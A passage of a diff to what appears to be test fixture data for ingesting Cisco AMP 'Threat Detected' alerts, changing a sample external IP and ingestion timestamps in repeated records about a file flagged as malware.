Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:36.337068900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":318000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -477,7 +477,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -524,7 +524,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -538,8 +538,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174515372Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":318000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196250\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:36.337073Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":318000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196250\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -561,7 +561,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -608,7 +608,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -622,8 +622,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174517419Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":303000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196249\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:36.337077900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":303000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196249\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -645,7 +645,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -692,7 +692,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -706,8 +706,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174519464Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":287000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196248\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:36.337084500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":287000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196248\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -729,7 +729,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -776,7 +776,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -790,8 +790,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174521504Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":256000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196247\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:36.337089500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":256000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196247\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -813,7 +813,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -860,7 +860,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -874,8 +874,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174523569Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":225000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196246\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:36.337095400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":225000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196246\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -897,7 +897,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -944,7 +944,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -958,8 +958,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174525813Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":225000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196245\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:36.337101500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":225000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196245\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -981,7 +981,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1028,7 +1028,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1042,8 +1042,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174527881Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":209000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196244\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:36.337107300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":209000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat 